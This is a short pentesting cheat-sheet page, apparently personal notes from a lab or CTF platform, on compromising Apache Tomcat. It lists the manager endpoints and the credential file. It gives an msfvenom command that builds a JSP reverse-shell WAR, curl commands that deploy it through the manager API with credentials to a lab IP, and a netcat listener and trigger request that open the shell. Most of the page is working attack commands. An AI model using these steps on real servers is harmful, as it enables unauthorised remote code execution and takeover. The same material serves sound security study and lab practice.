Tomcat

Tomcat is like a secondary service usually runs on port 8080

Intresting Endpoints

/manager/html
/host-manager/html

Important Files

tomcat-users.xml # contains usernames and passwords

Exploitation

Create a malicious .war file deploy it and obtain reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=1234 -f war > shell.war

Once deployed make a request to http://targeturi:8080/shell to obtain the reverse shell

NO-GUI

Whenever there is no GUI, the malicious war file can be still uploaded and deployed which will lead to obtaining a reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=1234 -f war > shell.war

# curl --upload-file rev.war 'http://<username>:<password>@<host>:8080/manager/text/deploy?path=/<deploy path>'
curl --upload-file shell.war 'http://tomcat:$3cureP4s5w0rd123!@10.129.113.205:8080/manager/text/deploy?path=/dnoscp'

# listen for a reverse shell
nc -lvnp 1234

# make a request and obtain reverse shell
# curl -L --head http://<host>:8080/deployPath
curl -L --head http://10.129.113.205:8080/dnoscp

PreviousBludit NextDrupal

Last updated 3 years ago

Was this helpful?